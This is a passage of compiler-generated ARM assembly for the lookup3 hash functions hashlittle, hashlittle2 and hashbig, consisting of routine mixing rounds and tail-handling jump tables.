r3, [fp, #-28] ror r3, r3, #16 ldr r2, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-28] ldr r3, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #18 ldr r2, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-24] ldr r3, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #8 ldr r2, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-24] .L79: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L81: .align 2 .L80: .word -559038737 .size hashlittle, .-hashlittle .align 2 .global hashlittle2 .syntax unified .arm .fpu softvfp .type hashlittle2, %function hashlittle2: @ args = 0, pretend = 0, frame = 48 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #52 str r0, [fp, #-40] str r1, [fp, #-44] str r2, [fp, #-48] str r3, [fp, #-52] ldr r3, [fp, #-48] ldr r2, [r3] ldr r3, [fp, #-44] add r2, r2, r3 ldr r3, .L138 add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-24] str r3, [fp, #-28] ldr r3, [fp, #-28] str r3, [fp, #-32] ldr r3, [fp, #-52] ldr r3, [r3] ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-40] str r3, [fp, #-36] ldr r3, [fp, #-36] and r3, r3, #3 cmp r3, #0 bne .L83 ldr r3, [fp, #-40] str r3, [fp, #-20] b .L84 .L85: ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #26 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #24 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #16 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #13 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #28 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-44] sub r3, r3, #12 str r3, [fp, #-44] ldr r3, [fp, #-20] add r3, r3, #12 str r3, [fp, #-20] .L84: ldr r3, [fp, #-44] cmp r3, #12 bhi .L85 ldr r3, [fp, #-44] cmp r3, #12 ldrls pc, [pc, r3, asl #2] b .L102 .L88: .word .L100 .word .L99 .word .L98 .word .L97 .word .L96 .word .L95 .word .L94 .word .L93 .word .L92 .word .L91 .word .L90 .word .L89 .word .L87 .L87: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L89: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] bic r3, r3, #-16777216 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L90: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L91: ldr r3, [fp, #-20] add r3, r3, #8 ldr r3, [r3] and r3, r3, #255 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L92: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L93: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] bic r3, r3, #-16777216 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L94: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L95: ldr r3, [fp, #-20] add r3, r3, #4 ldr r3, [r3] and r3, r3, #255 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L96: ldr r3, [fp, #-20] ldr r3, [r3] ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L97: ldr r3, [fp, #-20] ldr r3, [r3] bic r3, r3, #-16777216 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L98: ldr r3, [fp, #-20] ldr r3, [r3] lsl r3, r3, #16 lsr r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L99: ldr r3, [fp, #-20] ldr r3, [r3] and r3, r3, #255 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L100: ldr r3, [fp, #-48] ldr r2, [fp, #-24] str r2, [r3] ldr r3, [fp, #-52] ldr r2, [fp, #-28] str r2, [r3] b .L82 .L83: ldr r3, [fp, #-36] and r3, r3, #1 cmp r3, #0 bne .L103 ldr r3, [fp, #-40] str r3, [fp, #-16] b .L104 .L105: ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] add r3, r3, #8 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #10 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #26 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #24 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #16 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #13 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #28 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-44] sub r3, r3, #12 str r3, [fp, #-44] ldr r3, [fp, #-16] add r3, r3, #12 str r3, [fp, #-16] .L104: ldr r3, [fp, #-44] cmp r3, #12 bhi .L105 ldr r3, [fp, #-16] str r3, [fp, #-8] ldr r3, [fp, #-44] cmp r3, #12 ldrls pc, [pc, r3, asl #2] b .L102 .L108: .word .L120 .word .L119 .word .L118 .word .L117 .word .L116 .word .L115 .word .L114 .word .L113 .word .L112 .word .L111 .word .L110 .word .L109 .word .L107 .L107: ldr r3, [fp, #-16] add r3, r3, #8 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #10 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L109: ldr r3, [fp, #-8] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L110: ldr r3, [fp, #-16] add r3, r3, #8 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L111: ldr r3, [fp, #-8] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] .L112: ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #6 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L113: ldr r3, [fp, #-8] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L114: ldr r3, [fp, #-16] add r3, r3, #4 ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L115: ldr r3, [fp, #-8] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] .L116: ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-16] add r3, r3, #2 ldrh r3, [r3] lsl r3, r3, #16 add r3, r2, r3 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] b .L102 .L117: ldr r3, [fp, #-8] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L118: ldr r3, [fp, #-16] ldrh r3, [r3] mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] b .L102 .L119: ldr r3, [fp, #-8] ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] b .L102 .L120: ldr r3, [fp, #-48] ldr r2, [fp, #-24] str r2, [r3] ldr r3, [fp, #-52] ldr r2, [fp, #-28] str r2, [r3] b .L82 .L103: ldr r3, [fp, #-40] str r3, [fp, #-12] b .L121 .L122: ldr r3, [fp, #-12] ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #3 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-12] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #5 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #7 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-12] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-12] add r3, r3, #9 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-12] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-12] add r3, r3, #11 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #26 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #24 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #16 ldr r2, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] add r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #13 ldr r2, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-28] ldr r2, [fp, #-32] ldr r3, [fp, #-24] add r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-24] ldr r3, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #28 ldr r2, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-24] ldr r2, [fp, #-28] ldr r3, [fp, #-32] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-44] sub r3, r3, #12 str r3, [fp, #-44] ldr r3, [fp, #-12] add r3, r3, #12 str r3, [fp, #-12] .L121: ldr r3, [fp, #-44] cmp r3, #12 bhi .L122 ldr r3, [fp, #-44] cmp r3, #12 ldrls pc, [pc, r3, asl #2] b .L102 .L124: .word .L136 .word .L135 .word .L134 .word .L133 .word .L132 .word .L131 .word .L130 .word .L129 .word .L128 .word .L127 .word .L126 .word .L125 .word .L123 .L123: ldr r3, [fp, #-12] add r3, r3, #11 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L125: ldr r3, [fp, #-12] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L126: ldr r3, [fp, #-12] add r3, r3, #9 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-24] add r3, r2, r3 str r3, [fp, #-24] .L127: ldr r3, [fp, #-12] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-24] add r3, r3, r2 str r3, [fp, #-24] .L128: ldr r3, [fp, #-12] add r3, r3, #7 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L129: ldr r3, [fp, #-12] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L130: ldr r3, [fp, #-12] add r3, r3, #5 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-28] add r3, r2, r3 str r3, [fp, #-28] .L131: ldr r3, [fp, #-12] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-28] add r3, r3, r2 str r3, [fp, #-28] .L132: ldr r3, [fp, #-12] add r3, r3, #3 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L133: ldr r3, [fp, #-12] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L134: ldr r3, [fp, #-12] add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-32] add r3, r2, r3 str r3, [fp, #-32] .L135: ldr r3, [fp, #-12] ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-32] add r3, r3, r2 str r3, [fp, #-32] b .L102 .L136: ldr r3, [fp, #-48] ldr r2, [fp, #-24] str r2, [r3] ldr r3, [fp, #-52] ldr r2, [fp, #-28] str r2, [r3] b .L82 .L102: ldr r2, [fp, #-24] ldr r3, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #18 ldr r2, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #21 ldr r2, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-28] ldr r3, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #7 ldr r2, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-24] ldr r3, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #16 ldr r2, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-24] ldr r2, [fp, #-32] ldr r3, [fp, #-24] eor r3, r3, r2 str r3, [fp, #-32] ldr r3, [fp, #-24] ror r3, r3, #28 ldr r2, [fp, #-32] sub r3, r2, r3 str r3, [fp, #-32] ldr r2, [fp, #-28] ldr r3, [fp, #-32] eor r3, r3, r2 str r3, [fp, #-28] ldr r3, [fp, #-32] ror r3, r3, #18 ldr r2, [fp, #-28] sub r3, r2, r3 str r3, [fp, #-28] ldr r2, [fp, #-24] ldr r3, [fp, #-28] eor r3, r3, r2 str r3, [fp, #-24] ldr r3, [fp, #-28] ror r3, r3, #8 ldr r2, [fp, #-24] sub r3, r2, r3 str r3, [fp, #-24] ldr r3, [fp, #-48] ldr r2, [fp, #-24] str r2, [r3] ldr r3, [fp, #-52] ldr r2, [fp, #-28] str r2, [r3] .L82: add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L139: .align 2 .L138: .word -559038737 .size hashlittle2, .-hashlittle2 .align 2 .global hashbig .syntax unified .arm .fpu softvfp .type hashbig, %function hashbig: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #44 str r0, [fp, #-32] str r1, [fp, #-36] str r2, [fp, #-40] ldr r2, [fp, #-36] ldr r3, [fp, #-40] add r2, r2, r3 ldr r3, .L160 add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-12] str r3, [fp, #-20] ldr r3, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-32] str r3, [fp, #-24] ldr r3, [fp, #-32] str r3, [fp, #-8] b .L141 .L142: ldr r3, [fp, #-8] ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-8] add r3, r3, #1 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-8] add r3, r3, #2 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-16] add r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-8] add r3, r3, #3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-16] add r3, r3, r2 str r3, [fp, #-16] ldr r3, [fp, #-8] add r3, r3, #4 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-8] add r3, r3, #5 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-8] add r3, r3, #6 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-8] add r3, r3, #7 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-20] add r3, r3, r2 str r3, [fp, #-20] ldr r3, [fp, #-8] add r3, r3, #8 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #24 ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-8] add r3, r3, #9 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #16 ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-8] add r3, r3, #10 ldrb r3, [r3] @ zero_extendqisi2 lsl r3, r3, #8 ldr r2, [fp, #-12] add r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-8] add r3, r3, #11 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r3, [fp, #-12] add r3, r3, r2 str r3, [fp, #-12] ldr r2, [fp, #-16] ldr r3, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-12] ror r3, r3, #28 ldr r2, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-20] add r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-20] ldr r3, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-16] ror r3, r3, #26 ldr r2, [fp, #-20] eor r3, r3, r2 str r3, [fp, #-20] ldr r2, [fp, #-16] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-20] sub r3, r2, r3 str r3, [fp, #-12] ldr r3, [fp, #-20] ror r3, r3, #24 ldr r2, [fp, #-12] eor r3, r3, r2 str r3, [fp, #-12] ldr r2, [fp, #-20] ldr r3, [fp, #-16] add r3, r2, r3 str r3, [fp, #-20] ldr r2, [fp, #-16] ldr r3, [fp, #-12] sub r3, r2, r3 str r3, [fp, #-16] ldr r3, [fp, #-12] ror r3, r3, #16 ldr r2, [fp, #-16] eor r3, r3, r2 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-20] add r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-20] ldr r3, [fp, #-16] sub r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-16] ror r3, r3, #13 ldr r2, [fp, #-20] eor r3, r3, r2 str r3, [fp, #-20] ldr r2, [fp, #-16] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-16] ldr r2, [fp, #-12] ldr r3, [fp, #-20] sub r3, r2, r3 str r3, [fp, 